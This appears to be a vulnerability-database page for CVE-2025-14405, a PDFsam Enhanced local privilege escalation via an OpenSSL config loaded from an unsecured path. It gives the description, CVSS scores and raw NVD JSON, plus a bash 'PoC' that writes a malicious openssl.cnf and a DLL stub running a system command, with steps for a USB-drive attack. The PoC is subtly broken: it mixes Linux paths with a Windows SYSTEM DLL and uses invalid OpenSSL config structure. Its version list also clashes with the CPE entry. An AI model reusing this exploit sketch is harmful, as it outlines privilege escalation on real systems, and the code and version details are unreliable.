Security Vulnerability Report
CVE-2025-14405 CVSS 6.8 MEDIUM

CVE-2025-14405

Published: 2025-12-23 22:15:47
Last Modified: 2026-01-15 17:23:47

Description

PDFsam Enhanced Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows physically present attackers to escalate privileges on affected installations of PDFsam Enhanced. An attacker must first obtain the ability to mount a malicious drive onto the target system in order to exploit this vulnerability.

The specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27867.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:* - VULNERABLE
PDFsam Enhanced < 5.1.4
PDFsam Enhanced < 5.0.4
PDFsam Enhanced < 4.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-14405 PoC - PDFsam Enhanced Uncontrolled Search Path
# This PoC demonstrates creating a malicious OpenSSL config file
# that can be used to escalate privileges when PDFsam Enhanced loads

MALICIOUS_CONFIG="
[openssl_init]
section = evil_section

[evil_section]
# Point to a malicious DLL that will be loaded
# In real attack, this would be a DLL with payload code
dynamic_path = ./malicious.dll
"

# Create directory structure for the attack
mkdir -p /tmp/pdfsam_attack
cd /tmp/pdfsam_attack

# Create the malicious OpenSSL config file
echo "$MALICIOUS_CONFIG" > openssl.cnf

# Create a malicious shared library (placeholder for actual payload)
# In real attack scenario, this would be a compiled DLL with SYSTEM payload
cat > malicious.c << 'EOF'
// Placeholder for malicious DLL code
// Should contain code to execute with SYSTEM privileges
void __attribute__((constructor)) init() {
    // System-level code execution here
    system("whoami > /tmp/pwned.txt");
}
EOF

echo "[!] Attack files created in /tmp/pdfsam_attack"
echo "[!] In physical attack scenario:"
echo " 1. Mount USB drive with this structure"
echo " 2. Ensure drive letter matches PDFsam's OpenSSL config path"
echo " 3. Execute PDFsam Enhanced to trigger DLL loading"
echo " 4. Check /tmp/pwned.txt for SYSTEM-level execution"

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1093/ (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14405", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:47.077", "lastModified": "2026-01-15T17:23:47.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFsam Enhanced Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows phyiscally-present attackers to escalate privileges on affected installations of PDFsam Enhanced. An attacker must first obtain the ability to mount a malicious drive onto the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of OpenSSL. The product loads an OpenSSL configuration file from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-27867."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.7, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": 
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pdfsam:enhanced:7.0.76.15222:*:*:*:*:*:*:*", "matchCriteriaId": "6BDD768D-D92D-4D1C-977A-3987C03EACD2"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1093/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}